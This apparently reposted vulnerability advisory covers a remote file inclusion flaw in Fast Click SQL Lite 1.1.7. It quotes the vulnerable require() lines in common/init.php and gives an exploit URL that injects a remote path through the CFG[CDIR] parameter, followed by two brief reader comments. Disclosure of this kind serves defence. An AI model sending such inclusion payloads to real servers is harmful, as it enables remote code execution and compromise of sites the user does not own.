LFI to RCE via access_log injection

Fast CLick SQL 1.1.7 Lite - RFI


[o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability
Software : Fast CLick SQL Lite version 1.1.7
Vendor : http://www.ftrsoft.com/
Download : http://www.ftrsoft.com/downloads.html
Author : NoGe


[o] Vulnerable file
common/init.php
require($CFG['CDIR'].'/global.php');
require($CFG['CDIR'].'/sql.php');


[o] Exploit
http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]


[o] Publish
http://milw0rm.com/exploits/6785


Comments

labatterie said…
This is just the information I am finding everywhere.
edo said…
masih belajar ginian